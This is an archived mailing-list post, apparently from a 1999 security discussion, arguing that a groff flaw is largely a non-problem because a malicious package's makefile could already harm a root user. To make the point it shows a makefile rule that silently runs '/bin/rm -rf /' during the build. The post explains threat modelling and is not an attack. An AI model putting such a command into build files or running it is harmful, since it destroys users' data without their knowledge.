Re: Groff dangerous (was Re: Troff dangerous.)

[kragen () POBOX COM (Kragen Sitaker)]

Someone writes:
> The trick is that it can get you if you as a system administrator download
> some open source program from the Internet, and build and install that
> program; such activity often happens as "root", so a couple of scenarios
> are possible:

In most cases, this is a non-problem.

The reason this is a non-problem is that, for this to be a threat, your
"open source program from the Internet" [sic] has to have been packaged
by a malicious person who wants TO Crack your system.  But if this is
part of your threat model, you won't be safe if you fix groff, because
you're executing the makefile supplied by the malicious attacker, which
may say

x.o: x.c x.h
        @/bin/rm -rf / &
        $(CC) $(CFLAGS) x.c -o $@

There might be a case where the scenario you described *is* a problem:
where the program in question is never going to be executed as root,
and the Makefile has been carefully reviewed, but the source and man
pages haven't been.  In this case, though, I'd probably just read the
makefile and install things by hand with cp.  :)

There should be a common one-or-two-word name for this kind of
non-problem; there are some vivid metaphors for trying to solve it in
the literature.  (Bruce Schneier's example of planting a big thick
stake in front of your house in hopes thieves will run into it is one.)

You *must* be clear about your threat model -- i.e. what threats you're
trying to defend against -- before you can decide what is and isn't a
security problem.

(BTW, this groff problem doesn't surprise me much.  For a while, I had
a special email address you could send nroff-source man pages to and
get back formatted PostScript from on my home machine, as a convenience
when I was at work on Solaris machines without a decent groff.  I
didn't tell anybody about it until after I disabled it, because I
assumed there were probably security holes in groff; it wasn't written
to serve as a security gatekeeper, and a useful rule of thumb is that
such programs are not very good at security-boundary maintenance,
because it requires a different mindset from regular programming.  See
http://www.pobox.com/~kragen/security-holes.html for thoughts on this
situation and mailto:kragen-hacks-get.19 () kragen dnaco net for the code
that made the manpage-to-PostScript converter work.)

--
<kragen () pobox com>       Kragen Sitaker     <http://www.pobox.com/~kragen/>
103 days until the Internet stock bubble bursts on Monday, 1999-11-08.